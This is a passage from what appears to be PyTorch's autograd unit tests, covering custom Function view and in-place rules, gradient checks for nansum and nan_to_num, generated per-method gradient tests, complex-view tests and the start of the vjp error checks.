        # Original Tensor does not require grad
        a = torch.rand(1, 2)

        # Tensor being written does require grad
        b = torch.rand(1, requires_grad=True)

        # Take an invalid view on 'a' that should raise an error (warns during deprecation)
        view_a = MyFn.apply(a)

        with self.assertRaisesRegex(RuntimeError, "This view was created inside a custom Function"):
            view_a += b

        # Extra test for copy_ that is a manual implementation and could be easily
        # forgotten when the codegen is updated (warns during deprecation)
        a = torch.rand(1, 2)
        b = torch.rand(1, requires_grad=True)
        view_a = MyFn.apply(a)

        with self.assertRaisesRegex(RuntimeError, "This view was created inside a custom Function"):
            view_a.copy_(b)

        # Functions that should throw must properly throw
        a = torch.rand(1, 2)
        b = torch.rand(1, requires_grad=True)
        view_a = a.unbind()[0]
        with self.assertRaisesRegex(RuntimeError, "This view is the output of a function that returns "
                                    "multiple views."):
            view_a.copy_(b)

        # Sanity check that views that should work still work
        a = torch.rand(1, 2)
        b = torch.rand(1, requires_grad=True)
        a.select(1, 0).copy_(b)

    def _do_test_autograd_simple_views_python(self, dtype):
        # This is not necessarily the absolute correct behavior, but this is the current
        # one. This test is here to make sure that any change to this behavior is detected
        # and not silent. The TODOs below mark the places with unexpected behavior.
        # Note that any change in these tests will be BC-breaking and should be done carefully.

        # This checks the autograd.Function behavior when we return one or multiple outputs
        # while one of these is an input, a view of an input or of a temporary tensor.
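        # For orientation, a minimal sketch of the pattern exercised below (names
        # are illustrative only, this is not part of the test matrix): a custom
        # Function whose forward returns a view of its input, followed by an
        # in-place update of that output, e.g.
        #
        #     class ReturnsView(Function):
        #         @staticmethod
        #         def forward(ctx, x):
        #             return x.narrow(0, 0, 2)   # a view of the input
        #
        #         @staticmethod
        #         def backward(ctx, g):
        #             return g
        #
        #     out = ReturnsView.apply(torch.ones(3, requires_grad=True).clone())
        #     out += 1   # expected to raise: the view was created inside a custom Function
        #
        # The classes below cover the one-output, two-output and view-of-temporary
        # variants of this pattern.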
# This indicator is used to track how many times the backward function was called bw_called = [0] # This indicator is used to check if the argument `ga` contains non-zero values ga_nz = [False] class IdOneOutput(Function): @staticmethod def forward(ctx, a, b, make_view): if make_view: a = a.narrow(0, 0, 2) else: a = a.clone() return a @staticmethod def backward(ctx, ga): bw_called[0] += 1 return ga, None, None class IdTwoOutput(Function): @staticmethod def forward(ctx, a, b, make_view): if make_view: a = a.narrow(0, 0, 2) else: a = a.clone() return a, a + b @staticmethod def backward(ctx, ga, gab): bw_called[0] += 1 if ga.eq(0).all(): ga_nz[0] = False else: ga_nz[0] = True return ga + gab, gab, None class ViewOfTemp(Function): @staticmethod def forward(ctx, a, make_view): ctx.save_for_backward(a) if make_view: a = a.narrow(0, 0, 2) else: a = a.clone() b = a.clone() return b.select(0, 0) @staticmethod def backward(ctx, grad): bw_called[0] += 1 a, = ctx.saved_tensors res = torch.zeros_like(a) res.select(0, 0).copy_(grad) return res, None fn_id_to_inplace_view_err_msg = { "one_output": ("Output 0 of IdOneOutputBackward is a view and is being " "modified inplace. This view was created inside a custom Function"), "two_output": ("Output 0 of IdTwoOutputBackward is a view and is being modified inplace." " This view is the output of a function that returns multiple views."), "view_of_temp": ("Output 0 of ViewOfTempBackward is a view and is being " "modified inplace. This view was created inside a custom Function") } for fn_id in ["one_output", "two_output", "view_of_temp"]: for inplace in [True, False]: for make_view in [True, False]: # Used for special casing the tests below output_is_a_view = (make_view or fn_id == "view_of_temp") def fn(a, b): # never modify a, b inplace for gracheck a = a.clone() b = b.clone() if fn_id == "two_output": tmp1, tmp2 = IdTwoOutput.apply(a, b, make_view) if inplace: tmp1 += 3 tmp2 += 3 else: tmp1 = tmp1 + 3 tmp2 = tmp2 + 3 tmp = tmp1 * tmp2 else: if fn_id == "one_output": tmp = IdOneOutput.apply(a, b, make_view) else: tmp = ViewOfTemp.apply(a + b, make_view) if inplace: tmp += 3 else: tmp = tmp + 3 return tmp.sum() a = torch.ones(2, dtype=dtype, requires_grad=True) b = torch.ones(2, dtype=dtype, requires_grad=True) err_msg = fn_id_to_inplace_view_err_msg[fn_id] if not inplace or not output_is_a_view: gradcheck(fn, (a, b), check_batched_grad=False) # Was the custom backward called properly bw_called[0] = 0 ga_nz[0] = True # For the case where the backward is called if inplace and output_is_a_view: with self.assertRaisesRegex(RuntimeError, err_msg): fn(a, b) else: fn(a, b).backward() expected_called = 1 expected_ga_nz = True if output_is_a_view and inplace: expected_called = 0 self.assertTrue(bw_called[0] == expected_called) self.assertTrue(ga_nz[0] == expected_ga_nz) def test_autograd_simple_views_python(self): self._do_test_autograd_simple_views_python(torch.double) self._do_test_autograd_simple_views_python(torch.cdouble) def test_autograd_complex_views_python(self): # This is not necessarily the absolute correct behavior, but this is the current # one. This test is here to make sure that any change to this behavior is detected # and not silent. The TODOs below mark the places with unexpected behavior. # Note that any change in these test will be BC-breaking and should be done carefully. # This checks that multiples views in the forward are properly traced and how they # behave with respect to inplace operations. 
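        # In short (a summary of the checks below, not additional coverage): the
        # custom Function below creates more than one view of its input in forward
        # and returns the last one; backward through that output should still run
        # exactly once, while modifying the returned view in place should raise the
        # usual "is a view and is being modified inplace" error.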
# This indicator is used to track how many times the backward function was called bw_called = [0] class ComplexView(Function): @staticmethod def forward(ctx, a, idx): res = a.narrow(0, idx, 1) res = a.select(0, idx) ctx.save_for_backward(a) ctx.idx = idx return res @staticmethod def backward(ctx, grad): bw_called[0] += 1 a, = ctx.saved_tensors res = torch.zeros_like(a) res.select(0, ctx.idx).copy_(grad) return res, None a = torch.ones(2, requires_grad=True) idx = 1 bw_called[0] = 0 out = ComplexView.apply(a.clone(), idx) out.sum().backward() self.assertTrue(bw_called[0] == 1) out = ComplexView.apply(a.clone(), idx) with self.assertRaisesRegex(RuntimeError, "Output 0 of ComplexViewBackward is a view and is being modified inplace"): out += 1 def test_autograd_inplace_views_python(self): # This is not necessarily the absolute correct behavior, but this is the current # one. This test is here to make sure that any change to this behavior is detected # and not silent. The TODOs below mark the places with unexpected behavior. # Note that any change in these test will be BC-breaking and should be done carefully. # This test checks custom autograd.Function that perform inplace operations bw_called = [0] # I) Single output class MyAdder(Function): @staticmethod def forward(ctx, a, b): a.add_(b) ctx.mark_dirty(a) return a @staticmethod def backward(ctx, grad): bw_called[0] += 1 return grad, grad a = torch.ones(2, requires_grad=True) b = torch.ones(2, requires_grad=True) # No extra inplace c = MyAdder.apply(a.clone(), b) c.sum().backward() self.assertTrue(bw_called[0] == 1) # With extra inplace on the output bw_called[0] = 0 c = MyAdder.apply(a.clone(), b) c += 2 c.sum().backward() self.assertTrue(bw_called[0] == 1) # The input is a view bw_called[0] = 0 c = MyAdder.apply(a.clone().view_as(a), b) c.sum().backward() self.assertTrue(bw_called[0] == 1) # Should not give non-inputs to mark_dirty class MyAdderBad(Function): @staticmethod def forward(ctx, a, b): c = 3 * a c.add_(b) ctx.mark_dirty(c) return c @staticmethod def backward(ctx, grad): bw_called[0] += 1 grad = 3 * grad return grad, grad a = torch.ones(2, requires_grad=True) b = torch.ones(2, requires_grad=True) with warnings.catch_warnings(record=True) as w: MyAdderBad.apply(a.clone(), b) self.assertEqual(len(w), 1) # II) Multiple outputs class MyBadAdder(Function): @staticmethod def forward(ctx, a, b): a.add_(b) ctx.mark_dirty(a) return a, a + b @staticmethod def backward(ctx, ga, gab): bw_called[0] += 1 return ga + gab, ga + gab # No extra inplace bw_called[0] = 0 c, d = MyBadAdder.apply(a.clone(), b) (c * d).sum().backward() self.assertTrue(bw_called[0] == 1) # With extra inplace on the output bw_called[0] = 0 c, d = MyBadAdder.apply(a.clone(), b) c += 2 (c * d).sum().backward() self.assertTrue(bw_called[0] == 1) # The input is a view inplace_on_view_err = "your Function modifies inplace an input that is a view of another Tensor" with self.assertRaisesRegex(RuntimeError, inplace_on_view_err): c, d = MyBadAdder.apply(a.clone().view_as(a), b) # III) Inplace + other op class MyOutPlaceAdder(Function): @staticmethod def forward(ctx, a, b): a.add_(b) ctx.mark_dirty(a) return a.clone(), a + b @staticmethod def backward(ctx, ga, gab): bw_called[0] += 1 return ga + gab, ga + 2 * gab # We don't reuse the input def fn(a, b): orig_a = a.clone().view_as(a) c, d = MyOutPlaceAdder.apply(orig_a, b) return (c * d).sum() bad_mark_dirty_err = "Some elements marked as dirty during the forward method were not returned as output." 
with self.assertRaisesRegex(RuntimeError, bad_mark_dirty_err): fn(a, b) def test_named_tensor_for_complex_views(self): names = ["batch", "height", "width", "complex"] z = torch.ones((5, 12, 14, 2), requires_grad=True) z_named = z.refine_names(*names) z_complex = torch.view_as_complex(z_named.rename(None)).refine_names(*names[:-1]) z_complex.sum().backward() self.assertEqual(z.grad, torch.view_as_real(torch.ones_like(z_complex).rename(None))) def test_custom_function_return_view_in_nograd(self): class Alias(Function): @staticmethod def forward(ctx, x): return x[:] @staticmethod def backward(ctx, gx): return gx inp = torch.rand(2, requires_grad=True) with torch.no_grad(): output = Alias.apply(inp) with torch.no_grad(): expected_output = inp[:] # Calling the custom function should operate as if we called an equivalent op self.assertEqual(output.requires_grad, expected_output.requires_grad) # Check that in-place modification on view throws leaf_grad_err = "A view was created in no_grad mode and is being modified inplace" with self.assertRaisesRegex(RuntimeError, leaf_grad_err): output.zero_() def test_grad_mode_restored_reentrant(self): class MyFunction(Function): @staticmethod def forward(ctx, inp): return inp.clone() @staticmethod def backward(ctx, go): original = torch._C.is_grad_enabled() with torch.enable_grad(): self.assertTrue(torch._C.is_grad_enabled()) foo = torch.rand(go.size(), requires_grad=True) grad, = torch.autograd.grad( foo ** 3, foo, grad_outputs=go ) self.assertTrue(torch._C.is_grad_enabled()) self.assertTrue(torch._C.is_grad_enabled() == original) return grad inp = torch.rand(3, requires_grad=True) # Case where original==False MyFunction.apply(inp).sum().backward() # Case where original==True MyFunction.apply(inp).sum().backward(create_graph=True) def test_power_function(self): a = torch.tensor([0., 0., 0.]) b = torch.tensor([-1., 0., 1.], requires_grad=True) c = torch.sum(a**b) c.backward() self.assertEqual(b.grad, torch.tensor([-inf, 0., 0.])) s = 0 b = torch.tensor([-1., 0., 1.], requires_grad=True) c = torch.sum(s**b) c.backward() self.assertEqual(b.grad, torch.tensor([-inf, 0., 0.])) def test_nansum_with_nans(self): a = torch.randn(2, 2, 2, 2, dtype=torch.double) with torch.no_grad(): a[a < 0.2] = float('nan') a.requires_grad = True # No args gradcheck(lambda x: x.nansum(), a) gradgradcheck(lambda x: x.nansum(), a) # Single dim gradcheck(lambda x: x.nansum((0)), a) gradgradcheck(lambda x: x.nansum((0)), a) # Multi dim gradcheck(lambda x: x.nansum((0, 2)), a) gradgradcheck(lambda x: x.nansum((0, 2)), a) gradcheck(lambda x: x.nansum((0, -1)), a) gradgradcheck(lambda x: x.nansum((0, -1)), a) # With keep-dim gradcheck(lambda x: x.nansum((0, -1), True), a) gradgradcheck(lambda x: x.nansum((0, -1), True), a) def test_nansum_dtype(self): inp = torch.randn(2, 2, 2, 2) with torch.no_grad(): inp[inp < 0.2] = float('nan') def test(inp, inp_dtype, out_dtype): with torch.no_grad(): a = inp.to(inp_dtype) a.requires_grad = True b = torch.sum(a, dtype=out_dtype) b.backward() self.assertEqual(a.dtype, a.grad.dtype) test(inp, torch.float, torch.double) test(inp, torch.double, torch.float) def test_nan_to_num(self): a = torch.randn(3, 3, 3, 3, dtype=torch.double) with torch.no_grad(): a[torch.rand_like(a) < 0.2] = float('nan') a[torch.rand_like(a) < 0.2] = float('inf') a[torch.rand_like(a) < 0.2] = -float('inf') a.requires_grad = True gradcheck(lambda x: x.nan_to_num(), a) gradgradcheck(lambda x: x.nan_to_num(), a) gradcheck(lambda x: x.nan_to_num(nan=1.2), a) gradgradcheck(lambda x: 
x.nan_to_num(nan=1.2), a) gradcheck(lambda x: x.nan_to_num(nan=1.2, posinf=2.0), a) gradgradcheck(lambda x: x.nan_to_num(nan=1.2, posinf=2.0), a) gradcheck(lambda x: x.nan_to_num(nan=1.2, posinf=2.0, neginf=-2.0), a) gradgradcheck(lambda x: x.nan_to_num(nan=1.2, posinf=2.0, neginf=-2.0), a) gradcheck(lambda x: x.nan_to_num(posinf=2.0, neginf=-2.0), a) gradgradcheck(lambda x: x.nan_to_num(posinf=2.0, neginf=-2.0), a) gradcheck(lambda x: x.nan_to_num(neginf=-2.0), a) gradgradcheck(lambda x: x.nan_to_num(neginf=-2.0), a) def test_custom_function_error(self): class BadFw(Function): @staticmethod def backward(ctx, foo): return foo class BadBw(Function): @staticmethod def forward(ctx, foo): return foo.clone() inp = torch.rand(1, requires_grad=True) with self.assertRaisesRegex(NotImplementedError, "must implement the forward"): BadFw.apply(inp) with self.assertRaisesRegex(RuntimeError, "must implement the backward"): BadBw.apply(inp).sum().backward() def test_custom_function_local_inplace(self): class MyFn(torch.autograd.Function): @staticmethod def forward(ctx, inp, inplace): view = inp.clone()[:3] if inplace: view += 2 return view @staticmethod def backward(ctx, grad): return grad, None base = torch.rand(10, requires_grad=True) foo = MyFn.apply(base, False) self.assertEqual(foo.grad_fn.__class__.__name__, "MyFnBackward") foo = MyFn.apply(base, True) self.assertEqual(foo.grad_fn.__class__.__name__, "MyFnBackward") def test_integer_outputs(self): inp = torch.rand(4, requires_grad=True) out = inp.argmax() self.assertFalse(out.dtype.is_floating_point) self.assertFalse(out.requires_grad) out = inp.argmin() self.assertFalse(out.dtype.is_floating_point) self.assertFalse(out.requires_grad) out = inp.argsort() self.assertFalse(out.dtype.is_floating_point) self.assertFalse(out.requires_grad) val = torch.rand((), requires_grad=True) out = torch.searchsorted(inp, val) self.assertFalse(out.dtype.is_floating_point) self.assertFalse(out.requires_grad) bins = torch.linspace(0, 1.0, steps=100, requires_grad=True) vals = torch.rand(5, 5, requires_grad=True) out = torch.bucketize(vals, bins) self.assertFalse(out.dtype.is_floating_point) self.assertFalse(out.requires_grad) val = torch.empty(5).requires_grad_() out = val.count_nonzero() self.assertFalse(out.requires_grad) def assert_only_first_requires_grad(res): if not isinstance(res, tuple): res = (res,) self.assertTrue(res[0].requires_grad) for out in res[1:]: if out is not None: self.assertFalse(out.requires_grad) for sort in [True, False]: for return_inverse in [True, False]: for return_counts in [True, False]: res = torch.unique(inp, sorted=sort, return_inverse=return_inverse, return_counts=return_counts) assert_only_first_requires_grad(res) res = torch.unique(inp, sorted=sort, return_inverse=return_inverse, return_counts=return_counts, dim=0) assert_only_first_requires_grad(res) res = torch.unique_consecutive(inp, return_inverse=return_inverse, return_counts=return_counts) assert_only_first_requires_grad(res) res = torch.unique_consecutive(inp, return_inverse=return_inverse, return_counts=return_counts, dim=0) assert_only_first_requires_grad(res) # Here we test the internal functions to make sure all of them are # covered on top of the public API res = torch._unique(inp, sorted=sort, return_inverse=return_inverse) assert_only_first_requires_grad(res) # This looks public but is actually manually deleted from the # torch namespace in torch/functional.py res = torch._VF.unique_dim(inp, dim=0, sorted=sort, return_inverse=return_inverse, 
return_counts=return_counts) assert_only_first_requires_grad(res) # We don't test `unique_dim_consecutive` here. # It looks public but the python binding is actually manually disabled in # tools/autograd/gen_python_functions.py res = torch._unique2(inp, sorted=sort, return_inverse=return_inverse, return_counts=return_counts) assert_only_first_requires_grad(res) def index_perm_variable(shape, max_indices): if not isinstance(shape, tuple): shape = (shape,) index = torch.randperm(max_indices).narrow(0, 0, reduce(mul, shape)).view(shape) return index def bernoulli_scalar(): return torch.tensor(0, dtype=torch.uint8).bernoulli_() def gradgradcheck_method_precision_override(test_name): # these are just empirical observations, we should improve gradgradcheck_precision_override = { 'test_norm': {'atol': 2e-2, 'rtol': 1e-2}, 'test_norm_1_5': {'atol': 1.5e-2, 'rtol': 1e-2}, 'test_norm_3': {'atol': 5e-2, 'rtol': 1e-2}, 'test_dist': {'atol': 5e-2, 'rtol': 1e-2}, 'test_dist_4': {'atol': 8e-2, 'rtol': 1e-2}, } non_broadcasted_test_name = test_name.split("_broadcast")[0] override = gradgradcheck_precision_override.get(non_broadcasted_test_name) if override: if 'broadcast_lhs' in test_name or 'broadcast_rhs' in test_name: # errors accumulated across 1 dimension override = {'atol': override['atol'] * S, 'rtol': override['atol'] * S} elif 'broadcast_all' in test_name: # errors accumulated across multiple dimensions override = {'atol': override['atol'] * S * S, 'rtol': override['atol'] * S * S} return override def run_grad_and_gradgrad_checks(test_case, name, test_name, apply_method, output_variable, input_variables, run_gradgradcheck=True, check_batched_grad=True): test_case.assertTrue(gradcheck(apply_method, input_variables, eps=1e-6, atol=PRECISION, check_batched_grad=check_batched_grad)) if name in EXCLUDE_GRADGRADCHECK or test_name in EXCLUDE_GRADGRADCHECK_BY_TEST_NAME: return gradgradcheck_precision_override = gradgradcheck_method_precision_override(test_name) if gradgradcheck_precision_override is not None: atol = gradgradcheck_precision_override['atol'] rtol = gradgradcheck_precision_override['rtol'] test_case.assertTrue(gradgradcheck(apply_method, input_variables, None, atol=atol, rtol=rtol, gen_non_contig_grad_outputs=True, check_batched_grad=check_batched_grad)) else: test_case.assertTrue(gradgradcheck(apply_method, input_variables, gen_non_contig_grad_outputs=True, check_batched_grad=check_batched_grad)) def run_functional_checks(test_case, test_name, name, apply_fn, run_grad_checks, f_args_variable, f_args_tensor): output_variable = apply_fn(*f_args_variable) if run_grad_checks: run_grad_and_gradgrad_checks(test_case, name, test_name, apply_fn, output_variable, f_args_variable) self_variable = f_args_variable[0] if isinstance(output_variable, torch.Tensor) and output_variable.requires_grad and self_variable is not None: output_variable.backward(randn_like(output_variable)) test_case.assertEqualTypeString(self_variable, self_variable.grad) test_case.assertEqual(self_variable.size(), self_variable.grad.size()) # this list corresponds to ops which have separate tests defined for complex dtypes in # common_methods_invocations.py # test for these ops with 'complex' in variant should only run for complex and # the tests for these ops which do not have 'complex' in variant should not run for complex # and only run for floating point separate_complex_tests = ['div', '__rdiv__', 'sub'] # allow list for complex complex_list = ['t', 'view', 'reshape', 'reshape_as', 'view_as', 'roll', 'clone', 'expand', 
'rot90', 'transpose', 'permute', 'squeeze', 'unsqueeze', 'resize', 'resize_as', 'tril', 'triu', 'chunk', 'split', 'split_with_sizes', 'zero_', '__radd__', 'mul', '__rmul__', 'diagonal', 'fill_', 'sub', 'narrow', 'swapaxes', 'swapdims', 'tensor_split'] + separate_complex_tests # deny list for batched grad computation EXCLUDE_BATCHED_GRAD_TESTS = set([ 'test_to_sparse', ]) def add_test( name, self_size, args, variant_name='', check_ad=(), # only used in test_jit dim_args_idx=(), skipTestIf=(), output_process_fn=lambda x: x, kwargs=None): kwargs = kwargs if kwargs else {} basic_test_name = 'test_' + name if variant_name != '': basic_test_name += '_' + variant_name if name in separate_complex_tests and 'complex' in variant_name: run_only_complex = True else: run_only_complex = False for dtype in [torch.double, torch.cdouble]: for dim_perm in product([-1, 1], repeat=len(dim_args_idx)): test_name = basic_test_name new_args = [arg * dim_perm[dim_args_idx.index(i)] if i in dim_args_idx else arg for i, arg in enumerate(args)] test_name = basic_test_name + ''.join('_neg' + str(i) for i, idx in enumerate(dim_perm) if idx < 0) if dtype.is_complex: # TODO: remove this. this is temporary while we ramp up the complex support. if name in complex_list: if name in separate_complex_tests and 'complex' not in variant_name: continue if not run_only_complex: test_name = test_name + '_complex' else: continue elif run_only_complex: continue new_args = tuple(new_args) # for-loop bodies don't define scopes, so we have to save the variables # we want to close over in some way def do_test(self, device, dtype=dtype, name=name, self_size=self_size, args=new_args, test_name=test_name, output_process_fn=output_process_fn): def check(name): is_magic_method = name[:2] == '__' and name[-2:] == '__' is_inplace = name[-1] == "_" and not is_magic_method self_variable = create_input((self_size,), dtype=dtype, device=device)[0][0] # FixMe: run grad checks on inplace self if is_inplace: self_variable.requires_grad = False # need to record this because methods can change the size (e.g. 
unsqueeze) args_variable, kwargs_variable = create_input(args, requires_grad=not is_inplace, call_kwargs=kwargs, dtype=dtype, device=device) self_tensor = deepcopy(self_variable) args_tensor = deepcopy(unpack_variables(args_variable)) if not exclude_tensor_method(name, test_name): output_variable = getattr(self_variable, name)(*args_variable, **kwargs_variable) output_tensor = getattr(self_tensor, name)(*args_tensor, **kwargs_variable) if not isinstance(output_tensor, torch.Tensor) and not isinstance(output_tensor, tuple): if dtype.is_complex: output_tensor = torch.tensor((output_tensor, ), dtype=torch.cfloat, device=device) else: output_tensor = torch.tensor((output_tensor, ), dtype=torch.float, device=device) self.assertEqual(unpack_variables(output_variable), output_tensor) # TODO: check that both have changed after adding all inplace ops def fn(*inputs): output = getattr(inputs[0], name)(*inputs[1:], **kwargs) return output_process_fn(output) if not is_inplace and name not in EXCLUDE_GRADCHECK: check_batched_grad = test_name not in EXCLUDE_BATCHED_GRAD_TESTS run_grad_and_gradgrad_checks(self, name, test_name, fn, output_variable, (self_variable,) + args_variable, check_batched_grad=check_batched_grad) # functional interface tests torch_fn = getattr_qualified(torch, name) if torch_fn is not None and name not in EXCLUDE_FUNCTIONAL: def fn(*inputs): output = torch_fn(*inputs, **kwargs) return output_process_fn(output) f_args_variable = (self_variable,) + args_variable f_args_tensor = (self_tensor,) + args_tensor # could run the gradchecks again, but skip since we did it for the methods above. run_gradcheck = exclude_tensor_method(name, test_name) and not is_inplace and name not in EXCLUDE_GRADCHECK run_functional_checks(self, test_name, name, fn, run_gradcheck, f_args_variable, f_args_tensor) # check for correct type of input and input.grad if not is_inplace: self_variable = create_input((self_size,), requires_grad=True, dtype=dtype)[0][0] args_variable, kwargs_variable = create_input(args, requires_grad=False, call_kwargs=kwargs, dtype=dtype) if hasattr(self_variable, name): attribute_result = getattr(self_variable, name) if callable(attribute_result): output_variable = attribute_result(*args_variable, **kwargs_variable) else: self.assertTrue(len(args_variable) == 0) self.assertTrue(len(kwargs_variable) == 0) output_variable = attribute_result else: self_and_args_variable = (self_variable,) + args_variable output_variable = torch_fn(*self_and_args_variable, **kwargs_variable) if isinstance(output_variable, torch.autograd.Variable): if output_variable.is_sparse: rand = randn_like(output_variable.to_dense()).to_sparse() else: rand = randn_like(output_variable) output_variable.backward(rand) self.assertTrue(type(self_variable) == type(self_variable.grad)) self.assertTrue(self_variable.size() == self_variable.grad.size()) # compare grads to inplace grads inplace_name = name + '_' # can't broadcast inplace to left hand side skip_inplace = ('broadcast_lhs' in test_name or 'broadcast_all' in test_name) if hasattr(torch.ones(1), inplace_name) and not skip_inplace: output_variable = getattr(self_variable, name)(*args_variable, **kwargs_variable) if not isinstance(output_variable, tuple): output_variable = (output_variable,) inplace_self_variable = deepcopy(self_variable) inplace_self_variable_copy = tuple(i.clone() if isinstance(i, torch.Tensor) else i for i in (inplace_self_variable,)) inplace_args_variable = deepcopy(args_variable) inplace_args_variable_copy = tuple(i.clone() if isinstance(i, 
torch.Tensor) else i for i in inplace_args_variable) inplace_output_variable = ( getattr(inplace_self_variable_copy[0], inplace_name)(*inplace_args_variable_copy, **kwargs_variable)) if not isinstance(inplace_output_variable, tuple): inplace_output_variable = (inplace_output_variable,) self.assertEqual(inplace_output_variable, output_variable) # Check that gradient is the same for inp_i, i in zip((inplace_self_variable,) + inplace_args_variable, (self_variable,) + args_variable): if not isinstance(inp_i, torch.Tensor): assert not isinstance(i, torch.Tensor) continue if inp_i.grad is not None: with torch.no_grad(): inp_i.grad.zero_() if i.grad is not None: with torch.no_grad(): i.grad.zero_() for i_o, o in zip(inplace_output_variable, output_variable): if dtype.is_complex: grad = randn_like(i_o).to(torch.cdouble) else: grad = randn_like(i_o).double() i_o.backward(grad) o.backward(grad) for inp_i, i in zip((inplace_self_variable,) + inplace_args_variable, (self_variable,) + args_variable): if not isinstance(inp_i, torch.Tensor): continue self.assertEqual(inp_i.grad, i.grad) check(name) inplace_name = name + '_' # can't broadcast inplace to left hand side broadcast_skip_inplace = 'broadcast_lhs' in test_name or 'broadcast_all' in test_name if hasattr(torch.ones(1), inplace_name) and not broadcast_skip_inplace: check(inplace_name) assert not hasattr(TestAutograd, test_name), 'Two tests have the same name: ' + test_name for skip in skipTestIf: do_test = skip(do_test) setattr(TestAutogradDeviceType, test_name, do_test) class TestAutogradComplex(TestCase): def test_view_func_for_complex_views(self): # case 1: both parent and child have view_func x = torch.randn(2, 2, 2, dtype=torch.double, requires_grad=True) y = x.detach().requires_grad_(True) x0 = x.clone() x1 = torch.view_as_complex(x0) x2 = torch.view_as_real(x1) x2.mul_(2) x2.sum().backward() y0 = y.clone() y0.mul_(2) y0.sum().backward() self.assertEqual(x.grad, y.grad) # case 2: parent has view_func but child does not x = torch.randn(2, 2, 2, dtype=torch.double, requires_grad=True) y = x.detach().requires_grad_(True) def fn(a): b = a.clone() b1 = torch.view_as_complex(b) b2 = b1.reshape(b1.numel()) return b2 x0 = fn(x) x0.mul_(2) x0.sum().backward() y0 = fn(y) y1 = y0.mul(2) y1.sum().backward() self.assertEqual(x.grad, y.grad) # case 3: parent does not have a view_func but child does x = torch.randn(10, dtype=torch.cdouble, requires_grad=True) y = x.detach().requires_grad_(True) def fn(a, dim0_size=5): b = a.clone() b1 = b.reshape(dim0_size, 2) b2 = torch.view_as_real(b1) return b2 x0 = fn(x) x0.mul_(2) x0.sum().backward() y0 = fn(y) y1 = y0.mul(2) y1.sum().backward() self.assertEqual(x.grad, y.grad) def test_view_with_multi_output(self): x = torch.randn(2, 2, 2, dtype=torch.double) x1 = torch.view_as_complex(x) # Taking an invalid view should always be allowed as long as it is not # modified inplace res = x1.unbind(0) with self.assertRaisesRegex(RuntimeError, "output of a function that returns multiple views"): res[0] += torch.rand(2, requires_grad=True) x.requires_grad_(True) x1 = torch.view_as_complex(x) # Taking an invalid view should always be allowed as long as it is not # modified inplace res = x1.unbind(0) with self.assertRaisesRegex(RuntimeError, "output of a function that returns multiple views"): res[0] += torch.rand(2, requires_grad=True) def as_identity(self): # view_as_real and view_as_complex behavior should be like an identity def func(z): z_ = torch.view_as_complex(z) z_select = torch.select(z_, z_.dim() - 1, 0) 
z_select_real = torch.view_as_real(z_select) return z_select_real.sum() z = torch.randn(10, 2, 2, dtype=torch.double, requires_grad=True) gradcheck(func, [z]) func(z).backward() z1 = z.clone().detach().requires_grad_(True) torch.select(z1, z1.dim() - 2, 0).sum().backward() self.assertEqual(z.grad, z1.grad) class TestAutogradFunctional(TestCase): def _assert_same_struct(self, res, base): # base and res should be Tensors or tuple of Tensors with the same size if isinstance(base, torch.Tensor): self.assertTrue(isinstance(res, torch.Tensor)) self.assertEqual(base.size(), res.size()) elif isinstance(base, tuple): self.assertTrue(isinstance(res, tuple)) self.assertEqual(len(base), len(res)) for el_base, el_res in zip(base, res): self.assertTrue(isinstance(el_base, torch.Tensor)) self.assertTrue(isinstance(el_res, torch.Tensor)) self.assertEqual(el_base.size(), el_res.size()) else: # Wrong base raise RuntimeError("The base given to `_assert_same_struct` doesn't have" " the right structure.") def _assert_interleaved_struct(self, res, base1, base2): # base1 and base2 can be Tensors or tuples of Tensors. # If they are tuples, res should be a tuple as well. # The indexing works as follows for base1, base2 being # - tuple, tuple: res[i][j][k][l] = (base1[i][k], base2[j][l]) # - tuple, Tensor: res[i][k][l] = (base1[i][k], base2[l]) # - Tensor, tuple: res[i][j][l] = (base1[i], base2[j][l]) # - Tensor, Tensor: res[k][l] = (base1[k], base2[l]) if isinstance(base1, torch.Tensor) and isinstance(base2, torch.Tensor): self.assertTrue(isinstance(res, torch.Tensor)) self.assertEqual(res.size(), base1.size() + base2.size()) elif isinstance(base1, tuple) and isinstance(base2, torch.Tensor): self.assertTrue(isinstance(res, tuple)) self.assertEqual(len(res), len(base1)) for el_res, el_base1 in zip(res, base1): self.assertTrue(isinstance(el_res, torch.Tensor)) self.assertTrue(isinstance(el_base1, torch.Tensor)) self.assertEqual(el_res.size(), el_base1.size() + base2.size()) elif isinstance(base1, torch.Tensor) and isinstance(base2, tuple): self.assertTrue(isinstance(res, tuple)) self.assertEqual(len(res), len(base2)) for el_res, el_base2 in zip(res, base2): self.assertTrue(isinstance(el_res, torch.Tensor)) self.assertTrue(isinstance(el_base2, torch.Tensor)) self.assertEqual(el_res.size(), base1.size() + el_base2.size()) elif isinstance(base1, tuple) and isinstance(base2, tuple): self.assertTrue(isinstance(res, tuple)) self.assertEqual(len(res), len(base1)) for el_res, el_base1 in zip(res, base1): self.assertTrue(isinstance(el_res, tuple)) self.assertEqual(len(res), len(base2)) for el_el_res, el_base2 in zip(el_res, base2): self.assertTrue(isinstance(el_el_res, torch.Tensor)) self.assertTrue(isinstance(el_base2, torch.Tensor)) self.assertEqual(el_el_res.size(), el_base1.size() + el_base2.size()) else: # Wrong bases raise RuntimeError("The bases given to `_assert_interleaved_struct` don't have" " the right structure.") def test_vjp_err_check(self): def foo(a): return 3 * a.narrow(0, 0, 3) def bar(a): return 3 * a.narrow(0, 0, 3), "bar" inp = torch.rand(4) v = torch.ones(3) with self.assertRaisesRegex(TypeError, "The inputs given to vjp must be either a Tensor"): res = autogradF.vjp(foo, (inp, 2), v) with self.assertRaisesRegex(TypeError, "The outputs of the user-provided function given to vjp must"): res = autogradF.vjp(bar, inp, v) with self.assertRaisesRegex(RuntimeError, "The vector v can only be None if the user-provided function returns"): res = autogradF.vjp(foo, inp) with self.assertRaisesRegex(RuntimeError, 
